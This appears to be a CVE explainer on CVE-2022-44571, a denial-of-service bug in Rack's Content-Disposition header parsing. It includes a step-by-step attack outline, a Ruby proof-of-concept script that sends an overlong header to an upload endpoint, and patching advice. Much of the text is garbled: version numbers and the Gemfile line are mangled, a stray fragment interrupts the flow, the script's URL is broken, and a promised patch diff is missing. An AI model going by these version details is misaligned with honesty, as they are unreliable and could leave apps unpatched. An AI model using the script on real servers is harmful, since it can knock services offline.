CVE CyberSecurity Database News

CVE-2022-44571 - Denial of Service Vulnerability in Rack’s Content-Disposition Parsing (Explained)

Poster -

Summary:
CVE-2022-44571 is a security issue discovered in the Content-Disposition header parser in Rack, a key webserver interface library used by almost every Ruby on Rails application. This flaw, fixed in Rack versions 2..9.2, 2.1.4.2, 2.2.4.1, and 3...1, could let attackers craft malicious inputs that slow down servers drastically — making it possible for them to cause a Denial of Service (DoS).

What is Rack?

Rack acts as the connection between web servers and Ruby web apps, most notably those built on Rails, Sinatra, and other Ruby frameworks. When you upload a file or submit a multipart/form-data form, Rack handles parsing the HTTP headers, including Content-Disposition.

Denial of Service via Malicious Multipart Data

When a user uploads a file, the browser adds a Content-Disposition header to describe the form field. Rack parses this to know what the field and filename are. However, a bug in how Rack parsed this header could allow an attacker to create a specially crafted multipart upload that takes *far too long* to parse, tying up your server’s CPU/RAM.

In practical terms, by sending multiple or very slow multipart posts, an attacker could render your entire Rails application non-responsive — a classic DoS scenario.

Example of a Content-Disposition header

Content-Disposition: form-data; name="profile_pic"; filename="cat.png"

But what if you send a header with thousands of nested or malformed parameters? That’s where the vulnerability appeared.

3.. before 3...1

you’re impacted! This means almost *every* Rails app before late 2022 needs to update or risk being vulnerable.

Let’s break down a conceptual attack.

Step 1: Craft a multipart/form-data POST request, but instead of a normal header, use a very large or recursive Content-Disposition header value, possibly with thousands of quote pairs or semi-invalid escape sequences.

Step 2: Send this payload to an endpoint that handles file or form uploads (any Rails controller accepting POST with files).

Step 3: Rack will try to parse it — but due to the bug, the parsing will take *forever*, tying up the Ruby process.

If done in bulk, your server CPUs max out and your application stalls (DoS).

Practical Code Snippet

You can emulate the attack with a simple Ruby script and Net::HTTP:

require 'net/http'

# Craft a maliciously long Content-Disposition value
malicious_value = 'form-data; name="data"; filename="' + ('a' * 100_000) + '"'

uri = URI('http://localhost:300/upload';)
req = Net::HTTP::Post.new(uri)
req['Content-Type'] = 'multipart/form-data; boundary=boundary123'
req.body = <<~BODY
  --boundary123\r
  Content-Disposition: #{malicious_value}\r
  \r
  TestFileContent\r
  --boundary123--\r
BODY

res = Net::HTTP.start(uri.hostname, uri.port) { |http| http.request(req) }
puts "Got response: #{res.code}"

*Note: Don't run this against public servers unless you have permission—it can take servers offline!*

How Was It Fixed?

The fix tightened Rack’s parsing algorithm for the Content-Disposition header. The patched versions add guards to limit input complexity, avoid inefficient parsing, and gracefully reject overlong headers.

Here is the official patch diff for Rack.

How to Protect Your Rails & Ruby Applications

1. Update Rack Immediately

In your Gemfile, make sure you specify one of the patched versions

gem 'rack', '>= 2..9.2'

Then run

bundle update rack

2. Deploy
Push your changes to production as soon as possible.

3. Add WAF or Rate Limiting
To reduce the risk of future similar issues, use a Web Application Firewall or rate-limiting middleware to block abnormally heavy multipart/form-data uploads.

Original References

- Rack Security Advisory CVE-2022-44571
- NVD Database Entry
- Mitre CVE Record
- Rails Discussion

Closing Thoughts

CVE-2022-44571 is a classic case where even highly trusted infrastructure like Rack can have bugs with wide impact — every Rails app is at risk without the patch. Always keep dependencies up-to-date, and watch for security advisories from your stack.

By taking this flaw seriously and patching quickly, you defend your web apps against an easy path to downtime — keeping your Ruby services reliable and secure.

Timeline

Published on: 02/09/2023 20:15:00 UTC
Last modified on: 02/17/2023 18:51:00 UTC